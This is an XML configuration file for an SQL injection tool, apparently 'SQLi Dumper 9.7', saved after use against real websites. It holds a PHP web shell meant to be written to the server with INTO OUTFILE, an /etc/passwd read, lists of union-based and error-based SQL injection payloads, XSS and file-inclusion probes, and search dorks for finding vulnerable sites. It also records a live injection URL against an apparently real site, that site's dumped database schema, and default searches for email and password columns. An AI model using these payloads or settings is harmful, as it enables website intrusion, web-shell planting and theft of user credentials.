﻿<?xml version="1.0" encoding="UTF-8"?>
<SQLi_Dumper>
  <Section Name="LoginFinder">
    <Key Name="" Value="" />
    <Key Name="chkThreads" Value="False" />
    <Key Name="txtCookies" Value="" />
    <Key Name="txtAddHeaderValue" Value="" />
    <Key Name="chkWebApps" Value="True" />
    <Key Name="txtUserName" Value="" />
    <Key Name="txtWebApps" Value="php;asp;html" />
    <Key Name="chkHttpRedirect" Value="True" />
    <Key Name="txtDictPath" Value="C:\Users\Gidro\Desktop\SQLi Dumper 9.7\Origin\TXT\DicLoginFinder.txt" />
    <Key Name="txtPassword" Value="" />
    <Key Name="numThreads" Value="10" />
    <Key Name="btnWorkerPause" Value="False" />
    <Key Name="txtAddHeaderName" Value="" />
    <Key Name="cmbCharCasing" Value="" />
    <Key Name="chkStopWhenDetects" Value="True" />
    <Key Name="chkAddHearder" Value="False" />
    <Key Name="numTimeOut" Value="10" />
    <Key Name="numDelay" Value="200" />
  </Section>
  <Section Name="Dumper">
    <Key Name="txtCookies" Value="" />
    <Key Name="chkThreads" Value="False" />
    <Key Name="chkAddHearder" Value="False" />
    <Key Name="cmbMethod" Value="GET" />
    <Key Name="txtAddHeaderValue" Value="" />
    <Key Name="numSleepMultiThread" Value="50" />
    <Key Name="txtAddHeaderName" Value="" />
    <Key Name="cmbMySQLErrType" Value="Double Query" />
    <Key Name="numThreads" Value="10" />
    <Key Name="chkDumpIFNULL" Value="True" />
    <Key Name="txtCustomQueryFrom" Value="" />
    <Key Name="chkReDumpFailed" Value="True" />
    <Key Name="chkOracleCastAsChar" Value="True" />
    <Key Name="chkDumpFieldByField" Value="False" />
    <Key Name="numTimeOut" Value="10" />
    <Key Name="txtMySQLWriteFile" Value="'&lt;? System($_REQUEST['Cmd']); ?&gt;' " />
    <Key Name="cmbOracleErrType" Value="GET_HOST_ADDRESS" />
    <Key Name="trwSchema" Value="z106069_ludvik            [10]\ahtung                    [? #    ?]|z106069_ludvik            [10]\content                   [? #    ?]|z106069_ludvik            [10]\files                     [2 #    ?]\id\False|z106069_ludvik            [10]\files                     [2 #    ?]\fname\False|z106069_ludvik            [10]\g_books                   [? #    ?]|z106069_ludvik            [10]\g_msgs                    [? #    ?]|z106069_ludvik            [10]\gallery                   [? #    ?]|z106069_ludvik            [10]\news                      [? #    ?]|z106069_ludvik            [10]\parts                     [? #    ?]|z106069_ludvik            [10]\photo                     [? #    ?]|z106069_ludvik            [10]\vars                      [? #    ?]" />
    <Key Name="chkMSSQL_Latin1" Value="False" />
    <Key Name="chkHttpRedirect" Value="True" />
    <Key Name="numLimitMax" Value="0" />
    <Key Name="txtPost" Value="" />
    <Key Name="chkDumpEncodedHex" Value="False" />
    <Key Name="numSleep" Value="500" />
    <Key Name="chkDumpWhere" Value="False" />
    <Key Name="numFieldByField" Value="1" />
    <Key Name="cmbSqlType" Value="MySQL Union" />
    <Key Name="numLimitX" Value="0" />
    <Key Name="cmbMSSQLCast" Value="Nvarchar " />
    <Key Name="numMaxRetryMultiThread" Value="100" />
    <Key Name="txtPassword" Value="" />
    <Key Name="txtCustomQuery" Value="" />
    <Key Name="cmbMySQLCollations" Value="Unhex(Hex())" />
    <Key Name="chkClearListOnGet" Value="False" />
    <Key Name="chkAllInOneRequest" Value="True" />
    <Key Name="numMaxRetryColumn" Value="5" />
    <Key Name="cmbInjectionPoint" Value="URL" />
    <Key Name="cmbOracleTopN" Value="ROWNUM" />
    <Key Name="tscSchemas" Value="" />
    <Key Name="chkMSSQLCastAsChar" Value="True" />
    <Key Name="txtUserName" Value="" />
    <Key Name="chkDumpOrderBy" Value="False" />
    <Key Name="txtSchemaWhere" Value="1=1 or Not 1=0 " />
    <Key Name="numMaxRetry" Value="5" />
    <Key Name="txtSchemaOrderBy" Value="1 Asc, 2 Desc " />
    <Key Name="" Value="http://www.lud-vik.ru/index.php?item_id=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11" />
    <Key Name="lblVersion" Value="5.6.30" />
    <Key Name="lblCountry" Value="[RU] Russian Federation" />
    <Key Name="lblCountBDs" Value="-1 " />
    <Key Name="txtMySQLReadFilePath" Value="/etc/passwd" />
    <Key Name="txtMySQLWriteFilePath" Value="'/home/www/HostName_com/html/shell.php'" />
    <Key Name="cmbMySQLWriteFilePath" Value="INTO OUTFILE" />
    <Key Name="cmbMySQLReadFile" Value="HEX" />
    <Key Name="__CurrentDataBase" Value="z106069_ludvik" />
    <Key Name="trwSchema.Selected" Value="z106069_ludvik:files" />
  </Section>
  <Section Name="MainForm">
    <Key Name="URL_List_Line" Value="1" />
    <Key Name="Google.Domain" Value="com" />
    <Key Name="DuckDuckGo.Domain" Value="com" />
    <Key Name="Bing.Domain" Value="com" />
    <Key Name="Yahoo.Domain" Value="com" />
    <Key Name="Ask.Domain" Value="com" />
    <Key Name="const_5.Domain" Value="com" />
    <Key Name="const_6.Domain" Value="com" />
    <Key Name="Ixquick.Domain" Value="com" />
    <Key Name="Yandex.Domain" Value="com" />
    <Key Name="Rambler.Domain" Value="com" />
    <Key Name="Search.Domain" Value="com" />
    <Key Name="Dogpile.Domain" Value="com" />
    <Key Name="ThreadsScanner" Value="1" />
    <Key Name="ThreadsExploit" Value="30" />
    <Key Name="numSearchColumnThreads" Value="10" />
    <Key Name="cmbSearchColumnType" Value="0" />
    <Key Name="cmbSQLiSearch" Value="URL " />
    <Key Name="cmbSQLiNoInjectableSearch" Value="0" />
    <Key Name="cmbFileInclusaoSearch" Value="0" />
    <Key Name="txtSQLiSearch" Value="" />
    <Key Name="txtSQLiNoInjectableSearch" Value="" />
    <Key Name="txtFileInclusaoSearch" Value="" />
    <Key Name="btnSocksMyIP" Value="False" />
    <Key Name="cmbLanguages" Value="English" />
    <Key Name="cmbSearchColumn" Value="email" />
    <Key Name="cmbSearchColumn2" Value="password" />
    <Key Name="cmbSearchColumn3" Value="" />
    <Key Name="cmbSearchColumn4" Value="" />
    <Key Name="chkSearchColumn" Value="True" />
    <Key Name="chkSearchColumn2" Value="False" />
    <Key Name="chkSearchColumn3" Value="False" />
    <Key Name="chkSearchColumn4" Value="False" />
    <Key Name="lstSearchEngine" Value="Google:True|DuckDuckGo:True|Bing:True|Yahoo:True|Ask:True|const_5:True|const_6:True|Ixquick:True|Yandex:True|Rambler:True|Search:True|Dogpile:True|" />
    <Key Name="lstExpoitType" Value="const_0:True|const_1:True|const_2:True|const_3:True|" />
    <Key Name="lstAnalizerUnion" Value="' union all select [t] and '1'='1:True|999999.9 union all select [t]:True|999999.9 union all select [t]--:True| and 1'='1' union all select [t] and '1'='1:True| or 1'='1' union all select [t] and '1'='1:True|999999.9' union all select [t] and '1'='1:True|999999.9) union all select [t] and (1=1:True| and 1=1 union all select [t]:True| or 1=1 union all select [t]:True|" />
    <Key Name="lstAnalizerError" Value="' and [t] and '1'='1:True|' or [t] and '1'='1:True|[t]:True| and 1=[t] and 1=1:True| or 1=[t] and 1=1:True|' and 1=[t] and '1'='1:True|' or 1=[t] and '1'='1:True|[t]--:True| and 1=[t] and 1=1--:True|" />
    <Key Name="lvwLFIpathLinux" Value="/etc/passwd#root:/bin/bash|" />
    <Key Name="lvwLFIpathWin" Value="c:\\boot.ini#default=multi(|d:\\boot.ini#default=multi(|c://boot.ini#default=multi(|d://boot.ini#default=multi(|" />
    <Key Name="lvwWafs" Value="#%00|" />
    <Key Name="lvwXSS" Value="&quot;&gt;&lt;script &gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;#XSS|&quot;&gt;&lt;javascript:alert(String.fromCharCode(88,83,83));&quot;&gt;#XSS|" />
    <Key Name="lstExcludeUrlWords" Value="forum|showthread|.viewforum|.viewtopic|injection|dorks|union|hack|.gov|" />
    <Key Name="txtNotepad" Value="Version History&#xD;&#xA;&#xD;&#xA;02/16/2018 - v.9.6&#xD;&#xA;* Added Auto disable scanner blacklist IP&#xD;&#xA;* Fixed Scanner URL parser&#xD;&#xA;* Improved Exploiter, better detection rate&#xD;&#xA;* Misc: improvements, fixes and optimizations&#xD;&#xA;&#xD;&#xA;09/15/2017 - v.9.6&#xD;&#xA;* Added Grids Filters by date&#xD;&#xA;* Fixed Dumper data parser (for some MySQL Error injections)&#xD;&#xA;* Misc: improvements, fixes and optimizations&#xD;&#xA;&#xD;&#xA;09/01/2017 - v.9.5&#xD;&#xA;* Fix MySQL Load\Write File for MySQL v.4.x (Data Dumper)&#xD;&#xA;* Fix Stop Work 'Search Column\Table' MSG Box Error&#xD;&#xA;* Improved Search column sort&#xD;&#xA;* Improved Search Grids freezing&#xD;&#xA;* Improved ContextMenu poor visibility&#xD;&#xA;* Add Grids Key Control &#xD;&#xA;  CTRL + A to select All&#xD;&#xA;  Delete key to delete selected items&#xD;&#xA;  Enter key to go to dumper&#xD;&#xA;&#xD;&#xA;08/26/2017 - v.9.4&#xD;&#xA;* Added Germany, Portuguese and Persian Language&#xD;&#xA;* Added Import menu (queue)&#xD;&#xA;* Added Re-Exploiter menu&#xD;&#xA;* Improved Exploiter, better detection rate&#xD;&#xA;* Improved Data Dump, problem with '?~!' in MySQL Error Basead&#xD;&#xA;* Improved Scanner, IP/Proxy control with blacklisted&#xD;&#xA;* Improved Search Column\Tables&#xD;&#xA;* Improved Dumper Auto-Setup (detecting HTTP Flow Redirects)&#xD;&#xA;&#xD;&#xA;08/12/2017 - v.9.3&#xD;&#xA;* Added XXS support&#xD;&#xA;* Added Import URL Injectables.xml from v.8.x&#xD;&#xA;* Added extra 3 column (search rows)&#xD;&#xA;* Added Exploit from .txt (press Start Exploiter with queue empty)&#xD;&#xA;* Added Statistics Virtualization&#xD;&#xA;* Improved exploiter engine&#xD;&#xA;* Improved analyzer engine&#xD;&#xA;  ~40% better detection&#xD;&#xA;  fixed unique filter by domain&#xD;&#xA;  fixed loadfile bug dection&#xD;&#xA;* Improved Dumper for long time dumping (no more slow, only if request delays)&#xD;&#xA;* Improved RAM\CPU and Traffic use&#xD;&#xA;* Improved multi thread engine stop&#xD;&#xA;* Improved HTTP Debbuger, better delay control&#xD;&#xA;* Improved GUI Core Load\UnLoad performance&#xD;&#xA;* Improved Skins (added news, removed some)&#xD;&#xA;* Fixed grids auto scroll&#xD;&#xA;* Fixed open new instancie bug on schema&#xD;&#xA;&#xD;&#xA;04/04/2017 - v.9.2&#xD;&#xA;* New: Admin Login Finder&#xD;&#xA;* New: Full translation support&#xD;&#xA;* New: Complete XML Russian language&#xD;&#xA;* Updated: Dumper Form, fixe crash when dump in some cases&#xD;&#xA;* Fixed: MySQL Error Collocations&#xD;&#xA;* Misc: improvements, fixes and optimizations&#xD;&#xA;&#xD;&#xA;03/17/2017 - v.9.1&#xD;&#xA;* Improved: SQL Injection Exploiter&#xD;&#xA;* New: MySQL Load\Write (bruting path and checking on user_privileges table)&#xD;&#xA;* New: Check Alexa Rank, context menu on Grid (SQLi, File Inclusao)&#xD;&#xA;* Updated: Dumper Form, improvements, fixes and optimizations&#xD;&#xA;* Fixed: Bug on statistic cause crashe after x.x Gb&#xD;&#xA;* Misc: improvements, fixes and optimizations on Main Core&#xD;&#xA;&#xD;&#xA;03/01/2017 - v.9.0&#xD;&#xA;* Initial release" />
    <Key Name="chkAnalizerPostgreErrorUnion" Value="True" />
    <Key Name="cmbGUIHotKey" Value="A" />
    <Key Name="txtHexValue" Value="" />
    <Key Name="txtAccept" Value="Text/Html,Application/Xhtml Xml,Application/Xml;Q=0.9,*/*;Q=0.8 " />
    <Key Name="cmbSkin" Value="XP Kupo" />
    <Key Name="chkAnalizeMsAcessSybase" Value="True" />
    <Key Name="txtTextValue" Value="" />
    <Key Name="chkAnalizerMySQLErrorUnion" Value="True" />
    <Key Name="chkUpdater" Value="False" />
    <Key Name="chkAnalizerOracleErrorUnion" Value="True" />
    <Key Name="numExploitingDelay" Value="200" />
    <Key Name="btnPause" Value="False" />
    <Key Name="chkGroupChar" Value="True" />
    <Key Name="chkAnalizerMSSQLErrorUnion" Value="True" />
    <Key Name="txtMultiDorks" Value="?item_id=&#xD;&#xA;?productID=&#xD;&#xA;article ?id=&#xD;&#xA;detail ?id=&#xD;&#xA;newscat ?id=&#xD;&#xA;?page=&#xD;&#xA;?pageID=&#xD;&#xA;?cat_id=&#xD;&#xA;?filename=&#xD;&#xA;?loadfile=&#xD;&#xA;?section=&#xD;&#xA;?url=&#xD;&#xA;?site=&#xD;&#xA;?path=&#xD;&#xA;?include_file=&#xD;&#xA;?current_frame=&#xD;&#xA;?openfile=" />
    <Key Name="txtRFIurl" Value="http://www.google.com " />
    <Key Name="numHTTPRetry" Value="10" />
    <Key Name="numHTTPTimeout" Value="20" />
    <Key Name="numAnalizerUnionSart" Value="1" />
    <Key Name="txtRFIkeyword" Value="{window.google= " />
    <Key Name="chkSkin" Value="True" />
    <Key Name="txtResolveCountry" Value="" />
    <Key Name="txtSQLCharDelimiter" Value="+ " />
    <Key Name="cmbSQLChar" Value="Char" />
    <Key Name="numLFIpathTraversalCount" Value="10" />
    <Key Name="chkGUIHotKey" Value="False" />
    <Key Name="chkExploitIgnoreCookies" Value="False" />
    <Key Name="txtResolveIP" Value="" />
    <Key Name="cmbUpdater" Value="Каждую Неделю " />
    <Key Name="txtAnalizerExploitCode" Value="'[0] " />
    <Key Name="txtUserAgent" Value="Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0 " />
    <Key Name="txtSQLCharValue" Value="" />
    <Key Name="txtResolveAddress" Value="" />
    <Key Name="chkAnalizeMySQLReadWrite" Value="True" />
    <Key Name="chkSysTray" Value="False" />
    <Key Name="numAnalizerUnionEnd" Value="35" />
    <Key Name="chkSkipHttpStatus4xx" Value="True" />
    <Key Name="numPingPort" Value="80" />
    <Key Name="txtExcludeUrlWords" Value="" />
    <Key Name="chkScanningBlackListProxy" Value="True" />
    <Key Name="chkAnalizeWAF" Value="True" />
    <Key Name="numScanningDelay" Value="5000" />
    <Key Name="chkLfiWindowsSkip" Value="True" />
    <Key Name="chkAddHearder" Value="False" />
    <Key Name="numLimitMax" Value="0" />
    <Key Name="chkStopWhenDetects" Value="True" />
    <Key Name="txtSchemaWhere" Value="1=1 or Not 1=0 " />
    <Key Name="txtCustomQueryFrom" Value="" />
    <Key Name="chkDumpIFNULL" Value="True" />
    <Key Name="numDelay" Value="200" />
    <Key Name="txtCookies" Value="" />
    <Key Name="txtWebApps" Value="php;asp;html" />
    <Key Name="cmbCharCasing" Value="" />
    <Key Name="txtSchemaOrderBy" Value="1 Asc, 2 Desc " />
    <Key Name="txtAddHeaderValue" Value="" />
    <Key Name="numTimeOut" Value="10" />
    <Key Name="numSleepMultiThread" Value="50" />
    <Key Name="cmbInjectionPoint" Value="URL" />
    <Key Name="txtPost" Value="" />
    <Key Name="chkHttpRedirect" Value="True" />
    <Key Name="txtAddHeaderName" Value="" />
    <Key Name="chkAllInOneRequest" Value="True" />
    <Key Name="chkMSSQLCastAsChar" Value="True" />
    <Key Name="cmbMySQLCollations" Value="Unhex(Hex())" />
    <Key Name="txtCustomQuery" Value="" />
    <Key Name="chkThreads" Value="False" />
    <Key Name="chkMSSQL_Latin1" Value="False" />
    <Key Name="numMaxRetryMultiThread" Value="100" />
    <Key Name="txtPassword" Value="" />
    <Key Name="cmbMSSQLCast" Value="Nvarchar " />
    <Key Name="chkDumpEncodedHex" Value="False" />
    <Key Name="chkReDumpFailed" Value="True" />
    <Key Name="cmbOracleErrType" Value="GET_HOST_ADDRESS" />
    <Key Name="numSleep" Value="500" />
    <Key Name="chkDumpWhere" Value="False" />
    <Key Name="numMaxRetry" Value="5" />
    <Key Name="chkOracleCastAsChar" Value="True" />
    <Key Name="txtDictPath" Value="C:\Users\Gidro\Desktop\SQLi Dumper 9.7\Origin\TXT\DicLoginFinder.txt" />
    <Key Name="cmbOracleTopN" Value="ROWNUM" />
    <Key Name="chkDumpOrderBy" Value="False" />
    <Key Name="chkClearListOnGet" Value="False" />
    <Key Name="numLimitX" Value="0" />
    <Key Name="txtUserName" Value="" />
    <Key Name="chkDumpFieldByField" Value="False" />
    <Key Name="numMaxRetryColumn" Value="5" />
    <Key Name="cmbMySQLErrType" Value="Double Query" />
    <Key Name="chkWebApps" Value="True" />
    <Key Name="numFieldByField" Value="1" />
    <Key Name="numThreads" Value="10" />
    <Key Name="txtMySQLWriteFile" Value="'&lt;? System($_REQUEST['Cmd']); ?&gt;' " />
    <Key Name="cmbMethod" Value="GET" />
    <Key Name="trwSchema" Value="z106069_ludvik            [10]\ahtung                    [? #    ?]|z106069_ludvik            [10]\content                   [? #    ?]|z106069_ludvik            [10]\files                     [2 #    ?]\id\False|z106069_ludvik            [10]\files                     [2 #    ?]\fname\False|z106069_ludvik            [10]\g_books                   [? #    ?]|z106069_ludvik            [10]\g_msgs                    [? #    ?]|z106069_ludvik            [10]\gallery                   [? #    ?]|z106069_ludvik            [10]\news                      [? #    ?]|z106069_ludvik            [10]\parts                     [? #    ?]|z106069_ludvik            [10]\photo                     [? #    ?]|z106069_ludvik            [10]\vars                      [? #    ?]" />
  </Section>
  <Section Name="Statistics">
    <Key Name="6" Value="Process Created§|Running Process§" />
    <Key Name="3" Value="504 GatewayTimeout§1|200 OK§4467|Unknown\Blocked§10|403 Forbidden§164|500 InternalServerError§38|302 Redirect§124|404 NotFound§94|400 BadRequest§128|303 SeeOther§6|301 MovedPermanently§115|503 ServiceUnavailable§11|406 NotAcceptable§250|520§1" />
    <Key Name="2" Value="' and [t] and '1'='1§2|[t]§4|999999.9 union all select [t]§3|999999.9' union all select [t] and '1'='1§2" />
    <Key Name="0" Value="&quot;&gt;&lt;script &gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;§2|&quot;&gt;&lt;javascript:alert(String.fromCharCode(88,83,83));&quot;&gt;§1" />
  </Section>
</SQLi_Dumper>